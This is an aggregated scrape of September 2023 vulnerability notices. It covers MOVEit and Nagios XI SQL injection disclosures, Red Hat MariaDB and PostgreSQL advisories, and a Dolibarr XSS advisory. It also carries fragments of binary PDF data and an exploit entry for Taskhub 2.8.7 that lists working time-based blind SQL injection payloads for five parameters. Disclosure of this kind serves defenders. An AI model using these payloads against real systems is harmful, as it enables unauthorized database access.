
In Progress MOVEit Transfer versions released before 2021.1.8 (13.1.8), 2022.0.8 (14.0.8), 2022.1.9 (14.1.9), 2023.0.6 (15.0.6), a SQL injection vulnerability has been identified in the MOVEit Transfer web interface that could allow a MOVEit system administrator account to gain unauthorized access to the MOVEit Transfer database. A MOVEit system administrator

 could submit a crafted payload to the MOVEit Transfer web interface which could result in modification and disclosure of MOVEit database content.



Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-40043: Progress Customer Community

Red Hat Security Advisory 2023-5259-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: mariadb:10.3 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:5259-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5259  
Issue date:        2023-09-19  
CVE Names:         CVE-2022-32084 CVE-2022-32091 CVE-2022-38791   
                   CVE-2022-47015   
=====================================================================

1. Summary:

An update for the mariadb:10.3 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

MariaDB is a multi-user, multi-threaded SQL database server that is binary  
compatible with MySQL.

The following packages have been upgraded to a later upstream version:  
mariadb (10.3). (BZ#2223572, BZ#2223574, BZ#2223962, BZ#2223965)

Security Fix(es):

* mariadb: segmentation fault via the component sub_select (CVE-2022-32084)

* mariadb: server crash in JOIN_CACHE::free or in copy_fields  
(CVE-2022-32091)

* mariadb: compress_write() fails to release mutex on failure  
(CVE-2022-38791)

* mariadb: NULL pointer dereference in spider_db_mbase::print_warnings()  
(CVE-2022-47015)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [MariaDB 10.3.32] socat: E Failed to set SNI host "" (SST failure)  
(BZ#2223961)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MariaDB server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2106034 - CVE-2022-32084 mariadb: segmentation fault via the component sub_select  
2106042 - CVE-2022-32091 mariadb: server crash in JOIN_CACHE::free or in copy_fields  
2130105 - CVE-2022-38791 mariadb: compress_write() fails to release mutex on failure  
2163609 - CVE-2022-47015 mariadb: NULL pointer dereference in spider_db_mbase::print_warnings()  
2223572 - [Tracker] Rebase to MariaDB 10.3.39 [rhel-8.8.0.z]  
2223574 - [Tracker] Rebase to Galera 25.3.37 [rhel-8.8.0.z]  
2223961 - [MariaDB 10.3.32] socat: E Failed to set SNI host "" (SST failure) [rhel-8.8.0.z]  
2223962 - [MariaDB 10.3] JSON_VALUE() does not parse NULL properties properly [rhel-8.8.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
Judy-1.0.5-18.module+el8+2765+cfa4f87b.src.rpm  
galera-25.3.37-1.module+el8.8.0+19444+aac3c36b.src.rpm  
mariadb-10.3.39-1.module+el8.8.0+19673+72b0d35f.src.rpm

aarch64:  
Judy-1.0.5-18.module+el8+2765+cfa4f87b.aarch64.rpm  
Judy-debuginfo-1.0.5-18.module+el8+2765+cfa4f87b.aarch64.rpm  
Judy-debugsource-1.0.5-18.module+el8+2765+cfa4f87b.aarch64.rpm  
galera-25.3.37-1.module+el8.8.0+19444+aac3c36b.aarch64.rpm  
galera-debuginfo-25.3.37-1.module+el8.8.0+19444+aac3c36b.aarch64.rpm  
galera-debugsource-25.3.37-1.module+el8.8.0+19444+aac3c36b.aarch64.rpm  
mariadb-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-backup-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-backup-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-common-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-debugsource-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-embedded-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-embedded-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-embedded-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-errmsg-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-gssapi-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-gssapi-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-oqgraph-engine-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-oqgraph-engine-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-server-galera-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-server-utils-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-server-utils-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-test-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm  
mariadb-test-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.aarch64.rpm

ppc64le:  
Judy-1.0.5-18.module+el8+2765+cfa4f87b.ppc64le.rpm  
Judy-debuginfo-1.0.5-18.module+el8+2765+cfa4f87b.ppc64le.rpm  
Judy-debugsource-1.0.5-18.module+el8+2765+cfa4f87b.ppc64le.rpm  
galera-25.3.37-1.module+el8.8.0+19444+aac3c36b.ppc64le.rpm  
galera-debuginfo-25.3.37-1.module+el8.8.0+19444+aac3c36b.ppc64le.rpm  
galera-debugsource-25.3.37-1.module+el8.8.0+19444+aac3c36b.ppc64le.rpm  
mariadb-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-backup-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-backup-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-common-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-debugsource-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-embedded-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-embedded-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-embedded-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-errmsg-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-gssapi-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-gssapi-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-oqgraph-engine-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-oqgraph-engine-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-server-galera-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-server-utils-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-server-utils-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-test-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm  
mariadb-test-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.ppc64le.rpm

s390x:  
Judy-1.0.5-18.module+el8+2765+cfa4f87b.s390x.rpm  
Judy-debuginfo-1.0.5-18.module+el8+2765+cfa4f87b.s390x.rpm  
Judy-debugsource-1.0.5-18.module+el8+2765+cfa4f87b.s390x.rpm  
galera-25.3.37-1.module+el8.8.0+19444+aac3c36b.s390x.rpm  
galera-debuginfo-25.3.37-1.module+el8.8.0+19444+aac3c36b.s390x.rpm  
galera-debugsource-25.3.37-1.module+el8.8.0+19444+aac3c36b.s390x.rpm  
mariadb-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-backup-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-backup-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-common-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-debugsource-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-embedded-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-embedded-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-embedded-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-errmsg-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-gssapi-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-gssapi-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-oqgraph-engine-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-oqgraph-engine-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-server-galera-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-server-utils-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-server-utils-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-test-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm  
mariadb-test-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.s390x.rpm

x86_64:  
Judy-1.0.5-18.module+el8+2765+cfa4f87b.x86_64.rpm  
Judy-debuginfo-1.0.5-18.module+el8+2765+cfa4f87b.x86_64.rpm  
Judy-debugsource-1.0.5-18.module+el8+2765+cfa4f87b.x86_64.rpm  
galera-25.3.37-1.module+el8.8.0+19444+aac3c36b.x86_64.rpm  
galera-debuginfo-25.3.37-1.module+el8.8.0+19444+aac3c36b.x86_64.rpm  
galera-debugsource-25.3.37-1.module+el8.8.0+19444+aac3c36b.x86_64.rpm  
mariadb-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-backup-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-backup-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-common-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-debugsource-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-embedded-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-embedded-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-embedded-devel-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-errmsg-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-gssapi-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-gssapi-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-oqgraph-engine-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-oqgraph-engine-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-server-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-server-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-server-galera-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-server-utils-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-server-utils-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-test-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm  
mariadb-test-debuginfo-10.3.39-1.module+el8.8.0+19673+72b0d35f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32084  
https://access.redhat.com/security/cve/CVE-2022-32091  
https://access.redhat.com/security/cve/CVE-2022-38791  
https://access.redhat.com/security/cve/CVE-2022-47015  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlCb3ZAAoJENzjgjWX9erEDxEP/Aq+wfTm3Ops51Y9JC/obwkp  
HkxuJNiHTQT0JK6d3ESOE2/mIi0raSjpKRhJW3MnyDrJwNeZoTd93t1FaTAkAkA9  
U1za0tzSCvHv1vNz7ieB4DfrvVyW12oqBI26mckkRvuSfGli+yVZnKA9MinLVw+w  
E2V5l0yvvlTzNCqm5W4B1WeYTzHvYJz3bIuVcVWEBiIqpl6pjl086EhZZgttNEbW  
9MG67YqpAftxzP/PEJG57vIGNLrpUJu6k2OYTmOCWOwkE8JOvznTbqmtyoV8BPVT  
taokxWeLEZGvXSoNBfTZkON4Fvcx04eFzFXEObptHOajeeg9tmudE+GR6bjr0PJE  
5TDUOc45JGHbBKwDkX2qZCMtCHOXKirx83oQcZAbSzHCCk9zi/3nfWp3CZhpP8TI  
0/BUBJCmyzpNxehEMgiEFf62CQMS9h2FZvvdI5QgHQPVLPye2y9NWbwYyABI6mX4  
IwuOBHLkRoUej7pgjUvPAWYfQyEomUWegi6Jp0Vo6Pf8Jr0QCYh4J6HDGKoEO6uk  
Tdo1z1q0YIiv2a0EMWN3j+3fOweKJaPFGJiiOzRV/bsVzJR/TPHrsReWbkYplHmb  
VVLPRg4vtwqdSILgpNzF2E5qwwdN90wA2IIEWLruHw/H75a5+ZdeYzIadZvaFL7E  
sttMS85nL+3ugr4OSLB9  
=lKOL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5259-01

Multiple security flaws have been disclosed in the Nagios XI network monitoring software that could result in privilege escalation and information disclosure.
The four security vulnerabilities, tracked from CVE-2023-40931 through CVE-2023-40934, impact Nagios XI versions 5.11.1 and lower. Following responsible disclosure on August 4, 2023, They have been patched as of September 11, 2023, with

Network Security / Vulnerability

Multiple security flaws have been disclosed in the Nagios XI network monitoring software that could result in privilege escalation and information disclosure.

The four security vulnerabilities, tracked from CVE-2023-40931 through CVE-2023-40934, impact Nagios XI versions 5.11.1 and lower. Following responsible disclosure on August 4, 2023, They have been patched as of September 11, 2023, with the release of version 5.11.2.

"Three of these vulnerabilities (CVE-2023-40931, CVE-2023-40933 and CVE-2023-40934) allow users, with various levels of privileges, to access database fields via SQL Injections," Outpost24 researcher Astrid Tedenbrant said.

"The data obtained from these vulnerabilities may be used to further escalate privileges in the product and obtain sensitive user data such as password hashes and API tokens."

CVE-2023-40932, on the other hand, relates to a cross-site scripting (XSS) flaw in the Custom Logo component that could be used to read sensitive data, including cleartext passwords from the login page.

The list of flaws is described below -

*   **CVE-2023-40931** - SQL Injection in Banner acknowledging endpoint
*   **CVE-2023-40932** - Cross-Site Scripting in Custom Logo Component
*   **CVE-2023-40933** - SQL Injection in Announcement Banner Settings
*   **CVE-2023-40934** - SQL Injection in Host/Service Escalation in the Core Configuration Manager (CCM)

Successful exploitation of the three SQL injection vulnerabilities could permit an authenticated attacker to execute arbitrary SQL commands, while the XSS bug could be exploited to inject arbitrary JavaScript and read and modify page data.

This is not the first time security issues have been uncovered in Nagios XI. In 2021, Skylight Cyber and Claroty discovered as many as two dozen flaws that could be abused to hijack the infrastructure and achieve remote code execution.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Security Flaws Exposed in Nagios XI Network Monitoring Software 

Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject.

**Cross Site Scripting vulnerability in Dolibarr ERP CRM**

Moderate severity GitHub Reviewed Published Sep 20, 2023 to the GitHub Advisory Database • Updated Sep 21, 2023

GHSA-62wf-h26v-5m57: Cross Site Scripting vulnerability in Dolibarr ERP CRM

%PDF-1.7 %���� 1 0 obj <> endobj 2 0 obj <> endobj 3 0 obj <> endobj 4 0 obj <>/ExtGState<>/XObject<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.32 841.92\] /Contents 5 0 R/Group<>/Tabs/S>> endobj 5 0 obj <> stream x��\[�n7}���n 1� E}Q��Zn� �j+��jd�E�~p���J�l-K� \`e�K����H�c�'���;\`��\`���k�A�٤������v�����

CVE-2023-38888

A SQL injection vulnerability in Nagios XI 5.11.1 and below allows authenticated attackers with privileges to manage host escalations in the Core Configuration Manager to execute arbitrary SQL commands via the host escalation notification settings.

During some standard research as part of the Outpost24 Ghost Labs Vulnerability Research department, I discovered four different vulnerabilities in Nagios XI (version 5.11.1 and lower). Three of these vulnerabilities (CVE-2023-40931, CVE-2023-40933 and CVE-2023-40934) allow users, with various levels of privileges, to access database fields via SQL Injections. The data obtained from these vulnerabilities may be used to further escalate privileges in the product and obtain sensitive user data such as password hashes and API tokens.

The fourth vulnerability (CVE-2023-40932) allows Cross-Site Scripting via the Custom Logo component, which will render on every page, including the login page. This may be used to read and modify page data, such as plain-text passwords from login forms.

All these vulnerabilities have been resolved as of 2023.09.11 and users are advised to upgrade to 5.11.2 or later.

**What is Nagios XI**

Nagios XI is a popular and widely used commercial monitoring solution for IT infrastructure and network monitoring. It is the commercial version of the open-source Nagios Core monitoring platform, and provides added features to simplify the process of managing complex IT environments.

Due to the access required by Nagios XI, it is often deployed in high-privileged environments, which makes it an interesting asset for an attacker to target.

**The four vulnerabilities**

Nagios XI features “Announcement Banners”, which can optionally be acknowledged by users. The endpoint for this feature is vulnerable to a SQL Injection attack.

When a user acknowledges a banner, a POST request is sent to \`/nagiosxi/admin/banner\_message-ajaxhelper.php\` with the POST data consisting of the intended action and message ID – \`action=acknowledge banner message&id=3\`.

The ID parameter is assumed to be trusted but comes directly from the client without sanitization. This leads to a SQL Injection where an authenticated user with low or no privileges can retrieve sensitive data, such as from the \`xi\_session\` and \`xi\_users\` table containing data such as emails, usernames, hashed passwords, API tokens, and backend tickets.

This vulnerability does not require the existence of a valid announcement banner ID, meaning it can be exploited by an attacker at any time.

**2\. SQL Injection in Host/Service Escalation in CCM (CVE-2023-40934)**

The Core Configuration Manager in Nagios XI allows an authenticated user with privilege to manage host escalations to perform arbitrary database queries through the \`/nagiosxi/includes/components/ccm/index.php\` endpoint.

The parameters \`tfFirstNotif\`, \`tfLastNotif\`, and \`tfNotifInterval\` are assumed to be trusted despite coming directly from the client through a POST request.

This vulnerability results in the same access to the database as the other SQL Injection vulnerabilities, but requires additional privileges compared to CVE-2023-40931.

**3\. SQL Injection in Announcement Banner Settings (CVE-2023-40933)**

Nagios XI has an administrative page for Announcement Banner settings, which contains a SQL Injection vulnerability in the \`/nagiosxi/admin/banner message-ajaxhelper.php\` endpoint.

When performing the \`update\_banner\_message\_settings\` action on the affected endpoint, the \`id\` parameter is assumed to be trusted and is concatenated into a database query with no sanitization. This allows an attacker to modify the query.

Successful exploitation grants the same database access as the other two SQL Injection Vulnerabilities, but requires additional privileges compared to CVE-2023-40931.

**4\. Cross-Site Scripting in Custom Logo Component (CVE-2023-40932)**

Nagios XI can be customized with a custom company logo, which will be displayed across the entire product. This includes the landing page, various administrative pages, and the login page.

Due to a cross-site scripting vulnerability in this feature, an attacker can inject arbitrary JavaScript which will evaluate in any users’ browser. This can be used to read and modify page data, as well as perform actions on behalf on the affected user. Furthermore, as this renders on the login page, plain-text credentials can be stolen from users’ browsers as they enter them.

**Disclosure timeline**

We found and disclosed the vulnerabilities to Nagios in August 2023. Here’s what happened next:

*   2023-08-04 – Contacted vendor and submitted report
*   2023-08-04 – Vendor acknowledged report, started reviewing
*   2023-08-11 – Vendor confirmed all 4 vulnerabilities
*   2023-08-11 – Contacted MITRE for CVE allocation
*   2023-09-01 – CVEs reserved by MITRE
*   2923-09-07 – Coordinated disclosure for 2023-09-19
*   2023-09-11 – Nagios XI 5.11.2 released with security fixes applied
*   2023-09-19 – Vulnerabilities fully disclosed

**The importance of application security testing**

In a targeted attack, these types of vulnerabilities are relatively easy to exploit. As recent attacks have demonstrated (most notably the SolarWinds hack), IT management platforms are also likely targets. Without continuous application security testing in place, critical business data is at risk. Outpost24 provides security solutions and pen testing services with direct access to our security experts for remediation guidance and validation. Test your applications in real-time for the latest vulnerabilities with Outpost24.

**About Ghost Labs**

Ghost Labs is the specialist security unit within Outpost24 working in partnership with our clients to meet their penetration testing needs and objectives. Our experienced Offensive Security team offers enhanced and bespoke penetration testing security services such as advanced network penetration testing, (web)application testing, Red Teaming assessments and complex web application exploitation to help organizations have a true picture of their cyber risk. In addition, the Ghost Labs team is an active contributor to the security community with vulnerability research and coordinated responsible disclosure program.

Ghost Labs performs hundreds of successful penetration tests for its customers ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies. To help businesses drive security maturity and mitigate risks posed by the evolving threat and techniques of the modern-day hacker.

CVE-2023-40934: Nagios XI vulnerabilities resulting in privilege escalation (& more)

Taskhub version 2.8.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: taskhub 2.8.7 - SQL Injection# Exploit Author: CraCkEr# Date: 05/09/2023# Vendor: Infinitie Technologies# Vendor Homepage: https://www.infinitietech.com/# Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874# Demo: https://taskhub.company/auth# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4987# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /home/get_tasks_listGET parameter 'project' is vulnerable to SQL InjectionGET parameter 'status' is vulnerable to SQL InjectionGET parameter 'user_id' is vulnerable to SQL InjectionGET parameter 'sort' is vulnerable to SQL InjectionGET parameter 'search' is vulnerable to SQL Injectionhttps://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]---Parameter: project (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: status (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: user_id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=Parameter: sort (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=Parameter: search (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW---[-] Done

Taskhub 2.8.7 SQL Injection

Red Hat Security Advisory 2023-5269-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:15 security update  
Advisory ID:       RHSA-2023:5269-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5269  
Issue date:        2023-09-19  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:15 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.8-1.module+el8.8.0+17071+aaaceaa4.src.rpm  
pgaudit-1.7.0-1.module+el8.8.0+17071+aaaceaa4.src.rpm  
postgres-decoderbufs-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.src.rpm  
postgresql-15.3-1.module+el8.8.0+19565+1b0ddae0.src.rpm

aarch64:  
pg_repack-1.4.8-1.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
pg_repack-debuginfo-1.4.8-1.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
pg_repack-debugsource-1.4.8-1.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
pgaudit-1.7.0-1.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
pgaudit-debuginfo-1.7.0-1.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
pgaudit-debugsource-1.7.0-1.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
postgres-decoderbufs-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
postgres-decoderbufs-debuginfo-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
postgres-decoderbufs-debugsource-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.aarch64.rpm  
postgresql-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-contrib-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-contrib-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-debugsource-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-docs-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
